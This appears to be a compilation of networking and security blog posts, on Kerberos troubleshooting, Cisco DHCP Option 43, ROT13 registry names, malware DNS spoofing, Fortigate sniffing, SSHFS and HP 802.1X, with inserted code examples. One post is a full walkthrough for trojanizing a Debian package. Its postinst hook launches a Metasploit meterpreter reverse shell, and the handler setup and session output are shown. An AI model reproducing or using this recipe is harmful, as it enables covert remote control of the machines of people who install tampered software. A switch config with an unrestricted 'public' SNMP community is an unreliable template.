Windows XP Kerberos encryption

If you are having problems with OPC DCOM communication within your domain and are encountering the following errors and symptoms on the client side:

DCOM error code: “0x80070721”
Windows reports error 0x80070721 as: A security package specific error occurred.
Unable to receive data updates (asynchronous callbacks).

And the client's Event Viewer security log is riddled with

status error 0xc00002ee "An Error occured during Logon."
Event ID: 4625.


You might want to do a Wireshark capture of your DCOM calls and Kerberos traffic.

You can filter out your Kerberos traffic, by simply adding “kerberos” in the filter field.

If you notice any KRB5 TGS-REQ packets with the KRB error KRB5KDC_ERR_S_PRINCIPAL_UNKNOWN, dig into the value under:

Kerberos -> tgs-req -> req-body -> etype. If no AES encryption type is listed there while you are running a domain functional level of Windows Server 2008 or higher, you are probably hitting a Windows XP flaw.

This flaw can be patched on an XP SP3 system with this hotfix: https://support.microsoft.com/en-us/kb/969442

During my research I noticed I wasn’t the only one encountering this problem.

Creating a Linux trojan

**DISCLAIMER** I am not responsible for any stupid things you do with this information. **DISCLAIMER**

Attack vector
-Take an existing Debian package and insert a payload.
-Convince a user to install the corrupted package.

Setting up the packages
First we create the working environment in which we will download and corrupt the original package:

~$ mkdir /tmp/packing
~$ cd /tmp/packing

I chose Ninvaders as an example, which is a CLI-based clone of Space Invaders.

We download the .deb package only, but don’t install it:

~$ apt-get --download-only install ninvaders

Move the .deb package into our working directory and extract it there:

~$ mv /var/cache/apt/archives/ninvaders_0.1.1-3_amd64.deb /tmp/packing/
~$ dpkg -x ninvaders_0.1.1-3_amd64.deb work

We create a “DEBIAN” directory where we will put our payload.

~$ mkdir work/DEBIAN

In it we create the control and postinst files.

The control file can be written in conformance with the Debian Policy Manual,
or you can copy the control file from the original package into your new package.
We also need the postinst file, which runs after the package has been installed.
This is where we put the commands that execute our payload.

~$ ar -x ninvaders_0.1.1-3_amd64.deb
~$ tar -zxvf control.tar.gz ./control
~$ tar -zxvf control.tar.gz ./postinst

~$ mv control work/DEBIAN/
~$ mv postinst work/DEBIAN/

We create our payload ("ninvaders_credits") and copy it into our new package's build folder:

~$ msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=6666 X > ninvaders_credits
~$ mv ninvaders_credits work/usr/games/

Append a command to the postinst file, so our payload will be executed

~$ echo "sudo chmod 2755 /usr/games/ninvaders_credits && /usr/games/ninvaders_credits &" >> work/DEBIAN/postinst

Now we rebuild the corrupted package and give the package a better name.

~$ dpkg-deb --build /tmp/packing/work/
~$ mv work.deb ninvaders.deb

Setting up Metasploit
Now we’ll set up our Metasploit listener environment:

~$ msfconsole

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.2-2014111901 [core:4.10.2.pre.2014111901 api:1.0.0]]
+ -- --=[ 1370 exploits - 763 auxiliary - 219 post        ]
+ -- --=[ 340 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 6666
LPORT => 6666
msf exploit(handler) > exploit 

[*] Started reverse handler on 192.168.0.1:6666 
[*] Starting the payload handler...

When a victim is gullible enough to install this package, he will be able to play ninvaders, but the package will also automatically open a reverse TCP shell to the pre-defined host 192.168.0.1 on port 6666.

Victim:~$ dpkg -i ninvaders.deb 
Selecting previously unselected package ninvaders.
(Reading database ... 186286 files and directories currently installed.)
Preparing to unpack ninvaders.deb ...
Unpacking ninvaders (0.1.1-3) ...
Setting up ninvaders (0.1.1-3) ...
Processing triggers for man-db (2.6.7.1-1ubuntu1) ...

After the victim (192.168.0.50) installs the package, the attacker will receive the reverse TCP session and can wreak all kinds of havoc.


[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 192.168.0.50
[*] Meterpreter session 1 opened (192.168.0.1:6666 -> 192.168.0.50:43035) at 2015-02-26 21:02:18 +0100

Exploiting the victim


meterpreter > sysinfo
Computer     : Victim
OS           : Linux Victim 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux

Conclusion:
Even Linux machines can get infected with binaries if the right precautions aren't taken (source checking, MD5 sum checks, GPG signature checks, etc.).
But the main issue with trojans is gullible users; I can even blame myself for running unchecked packages.
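As an added defensive example (my own code, not from the original post), here is a Python script that opens a .deb's ar container, reads the maintainer scripts out of control.tar.gz and flags lines like the one appended to postinst above. The heuristics and the in-memory sample package are constructed for this example.

```python
import io, re, tarfile

AR_MAGIC = b"!<arch>\n"
SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
SUSPICIOUS = [  # constructed heuristics; not a complete list
    (re.compile(r"&\s*$"), "command sent to background"),
    (re.compile(r"\bsudo\b"), "sudo in maintainer script"),
    (re.compile(r"\bchmod\s+[2-7][0-7]{3}\b"), "setuid/setgid/sticky bit set via chmod"),
    (re.compile(r"\b(nc|ncat|curl|wget)\b|/dev/tcp/"), "network tool in maintainer script"),
]

def ar_members(data):
    """Yield (name, body) for each member of an ar archive, the container format of a .deb."""
    assert data.startswith(AR_MAGIC), "not an ar archive"
    pos = len(AR_MAGIC)
    while pos + 60 <= len(data):
        hdr = data[pos:pos + 60]                        # fixed 60-byte member header
        name = hdr[:16].decode().strip().rstrip("/")    # GNU ar may append a '/'
        size = int(hdr[48:58].decode())                 # decimal size field
        yield name, data[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)                   # members are 2-byte aligned

def inspect_deb(data):
    """Return (script, line number, reason) for every suspicious line in the maintainer scripts."""
    findings = []
    for name, body in ar_members(data):
        if not name.startswith("control.tar"):          # control.tar.gz or control.tar.xz
            continue
        with tarfile.open(fileobj=io.BytesIO(body), mode="r:*") as tf:
            for m in tf.getmembers():
                script = m.name.split("/")[-1]
                if script not in SCRIPTS:
                    continue
                text = tf.extractfile(m).read().decode(errors="replace")
                for lineno, line in enumerate(text.splitlines(), 1):
                    findings.extend((script, lineno, why) for pat, why in SUSPICIOUS if pat.search(line))
    return findings

def build_sample_deb(postinst):
    """Construct a minimal .deb in memory (a constructed sample, not a real Debian package)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, text in (("./control", "Package: sample\nVersion: 0\n"), ("./postinst", postinst)):
            info = tarfile.TarInfo(name)
            info.size = len(text.encode())
            tf.addfile(info, io.BytesIO(text.encode()))
    def member(name, body):                             # one ar member: header + padded body
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{100644:<8}{len(body):<10}`\n".encode()
        return hdr + body + (b"\n" if len(body) % 2 else b"")
    return AR_MAGIC + member("debian-binary", b"2.0\n") + member("control.tar.gz", buf.getvalue())
```

To check a real package, pass the bytes of the downloaded .deb to inspect_deb() before running dpkg -i.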

sources:
Ninvaders
Binary Linux Trojans

Option 43 Cisco WLC discovery

When your AP boots, it will first discover which controllers are available.
One of the techniques is through its received DHCP options.

Two specific options are used here:

Option 60 and Option 43

Option 60
If you want this subnet to be used only by a certain AP type, you can use this option to check the "Vendor Class Identifier" (VCI) string.
A list of Cisco-specific VCI strings can be found here.
If you want any device to be able to get a DHCP offer in this subnet, you can just leave out option 60.

Option 43
If you want the APs to discover Wireless LAN Controllers through DHCP, you'll have to put the IPs of your controllers in here.
This option has a Type-Length-Value (TLV) encoding.

Type
The type is always 0xf1

Length
This is the number of IP addresses you want to put into the DHCP offer, times 4.
So, if you put 1 address in there, this value would be 0x04.
If you have 2 IP addresses, it will be 0x08 (2 times 4 = 8, and 8 in hex is 0x08).
If you have 6 IP addresses, it will be 0x18 (6 times 4 = 24, and 24 in hex is 0x18).

Value
This is derived from your IP address(es).
Convert every decimal octet to its hexadecimal value.
If you have a controller at 172.16.20.1, this becomes ac101401 (172 = 0xac, 16 = 0x10, 20 = 0x14, 1 = 0x01).

So if we take all of this together, and create an example with a single Wireless Controller at 172.16.20.1, this will give us: f104ac101401

If you do a “dhcp debug detail” on your AP, you will see the value:
*Mar  1 00:05:40.027: DHCP: Scan: Vendor specific option 43: F104AC101401

For multiple controllers, the secondary value simply needs to be appended,
e.g. if you have a secondary controller at 172.16.20.2, the value needs to be:
f108ac101401ac101402.
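As an added example (my own code, not from the original post), a small Python encoder/decoder for this TLV that reproduces the values above and also validates the type and length bytes, which is where hand-typed Option 43 strings usually go wrong:

```python
import ipaddress

CISCO_WLC_TYPE = 0xF1  # sub-option type used for controller discovery, as described above

def encode_option43(controllers):
    """Build the Option 43 payload (type, length, packed IPv4 addresses) for the given controllers."""
    if not controllers:
        raise ValueError("at least one controller address is required")
    value = b"".join(ipaddress.IPv4Address(ip).packed for ip in controllers)
    if len(value) > 255:
        raise ValueError("too many controllers for a one-byte length field")
    return bytes([CISCO_WLC_TYPE, len(value)]) + value

def option43_hex(controllers):
    """The hex string you would paste into the DHCP server configuration."""
    return encode_option43(controllers).hex()

def decode_option43(payload):
    """Parse a TLV payload back into controller addresses, checking type and length consistency."""
    if len(payload) < 2 or payload[0] != CISCO_WLC_TYPE:
        raise ValueError("not a Cisco WLC discovery sub-option")
    length, value = payload[1], payload[2:]
    if length != len(value) or length % 4:
        raise ValueError(f"length byte {length:#04x} does not match value ({len(value)} bytes)")
    return [str(ipaddress.IPv4Address(value[i:i + 4])) for i in range(0, length, 4)]
```

bytes.fromhex() is case-insensitive, so the uppercase value printed by the AP debug can be fed straight into decode_option43().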

Hexadecimal, decimal and binary conversion can be done here.

Windows Registry – Caesar Shift

If you have ever used Process Monitor to monitor a process's behaviour, you might have noticed some odd-looking words in the registry being queried by explorer.exe.

These are actually normal words to which a Caesar shift of 13 has been applied.

In cryptography, a Caesar shift is one of the simplest and most widely known encryption techniques. It is a type of substitution cipher in which each letter in the plaintext is replaced by a letter some fixed number of positions down the alphabet, in this case a shift of 13.
A shift of 13 is self-inverse, so the same code can be used for "encryption" and "decryption".

If I put some words from the example above into my Caesar shift 13 tool:
Zvpebfbsg.NhgbTrarengrq
vfpfvpcy.rkr
ZqFpurq.rkr
cevagznantrzrag.zfp
freivprf.zfp

microsoft.autogenerated

iscsicpl.exe
mdsched.exe
printmanagement.msc
services.msc

These entries live under the parent key {CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}, which is a list of applications, files etc. that have recently been accessed.
Programs that have been launched from the command line will not appear in this list. Nevertheless, this decoding can be a useful tool in computer forensics.
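As an added example (my own code, not the author's tool), a generic Caesar shift in Python, the shift-13 special case, and a helper that decodes only the value name at the end of a Process Monitor registry path. The sample paths are constructed; the GUID is the one named above, while the UserAssist\Count prefix is my assumption about where that key lives.

```python
import string

def caesar(text, shift=13):
    """Shift ASCII letters by `shift` positions (negative shifts decode); other characters are kept."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)          # dots, digits, braces and backslashes pass through unchanged
    return "".join(out)

def rot13(text):
    """Shift 13 is its own inverse, so one function both encodes and decodes."""
    return caesar(text, 13)

def decode_registry_path(path):
    """Decode only the value name (the last path component); the key path itself is not shifted."""
    parent, sep, value = path.rpartition("\\")
    return parent + sep + rot13(value)

# Constructed sample paths in the style of the Process Monitor output discussed above.
USERASSIST = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count"
SAMPLE_PATHS = [USERASSIST + "\\" + v for v in ("Zvpebfbsg.NhgbTrarengrq", "vfpfvpcy.rkr", "ZqFpurq.rkr")]

def decode_samples():
    """Return just the decoded value names of SAMPLE_PATHS."""
    return [decode_registry_path(p).rpartition("\\")[2] for p in SAMPLE_PATHS]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(decode_registry_path(p))
```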

DNS Spoofing with APATEDNS

If you quickly want to find out what the malware in your sandbox is resolving, you can use ApateDNS. This free tool listens for outgoing DNS requests and is able to spoof the answer.

In my example I started the ApateDNS tool in my sandbox and set the DNS reply IP to my secondary machine, 10.150.120.150.
I captured a DNS request for "www.google.be" and its DNS response address was spoofed to 10.150.120.150. This way the malware will open its connection to this IP address, 10.150.120.150.

Next I'll set up the "TCP/IP Swiss army knife", netcat.
On my secondary machine, the one with IP 10.150.120.150, I started a netcat listener on port 80.

 ~ $ sudo nc -l 80

If the malware then opens an HTTP connection to "www.google.be", I will receive its HTTP requests.
Example:

GET / HTTP/1.1
Accept: */*
Accept-Language: nl-be
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.google.be
Connection: Keep-Alive
Cookie: PREF=ID=815......:

This might be a fast way to find out what connections your malware is trying to make.

(netcat is also available for Windows)

Fortigate packet sniffing

After working with a Fortigate for a while, I noticed that the Fortianalyzer tool can become very slow, mostly due to the disk usage on the box. And when you are troubleshooting priority connections, you just don't have the time to wait for the box.

Luckily, Fortinet has also implemented a packet sniffer in the CLI.
To make use of it, log on to the required VDOM:


FG620B # config vdom
FG620B (vdom) # edit VdomNAME
current vf=VdomNAME:1
FG620B (VdomNAME) # diagnose sniffer packet port5 'src host 10.150.120.150 and port 22 and dst host 203.0.113.1'
interfaces=[port5]
filters=[src host 10.150.120.150 and port 22 and dst host 203.0.113.1]
6.667023 10.150.120.150.46485 -> 203.0.113.1.22: syn 2622767143 
6.679312 10.150.120.150.46485 -> 203.0.113.1.22: ack 1157725779 
...

As you can see, Fortigate requires the command "diagnose sniffer packet" followed by the interface on which to capture (port5).
Finally you can add a filter in regular tcpdump syntax. In this example I am looking for traffic from my source host 10.150.120.150 to the destination host 203.0.113.1 on its SSH port (22).

Mounting SFTP resources

As described by damontimm, it is possible to mount an SFTP folder (SSH + FTP) on a Debian-based system using SSHFS and FUSE.

I followed his small tutorial, but had to change a few things.

First we install sshfs and add our own user to the fuse group (in this case wannes).

~$ sudo aptitude update
~$ sudo aptitude install sshfs
~$ sudo adduser wannes fuse

As stated on damontimm's blog and this one, we'll have to log out and back in.
This can be a pain, so we can use this command instead to get the effective permissions of the fuse group for this user.

~$ newgrp fuse

Now we create a folder on our own machine on which we will mount the remote resource.
In this case I'll be mounting the folder /var/www of the remote host.

~$ mkdir sftpfolder
~$ sshfs -o allow_other remote_user@remote_host:/var/www/ sftpfolder

I added the “allow_other” option, because without this option, only the user who ran sshfs can access the mount.

802.1X on HP Procurve

Sometimes I have to implement 802.1X on non-Cisco devices. Yes, even on HP Procurve.

In this situation I have created a setup with an HP Procurve 2610-24/12PWR uplinked with Port 1 to the rest of the network.


hostname "DOT1X-HP-SWITCH"
ip default-gateway 10.90.1.254
snmp-server community "public" Unrestricted

vlan 1
name "DEFAULT_VLAN"
untagged 2-28
ip address dhcp-bootp
no untagged 1
exit

vlan 320
name "VLAN320"
untagged 1
ip address 10.90.1.1 255.255.255.0
exit

vlan 369
name "Access VLAN"
tagged 1
exit

aaa authentication port-access eap-radius
radius-server host 10.150.150.150 key test123
aaa port-access authenticator 2-24
aaa port-access authenticator active
password manager
password operator

A client can now connect to ports 2-24; the HP switch will use 10.150.150.150 as RADIUS server with the PSK "test123".

If the RADIUS server successfully authenticates and authorizes the client, it can, for example, send these RADIUS attributes back to the switch, which will then place the client in VLAN 369.

Access Type= ACCESS_ACCEPT
Tunnel-Private-Group-ID=1:369
Tunnel-Type=1:13
Tunnel-Medium-Type=1:6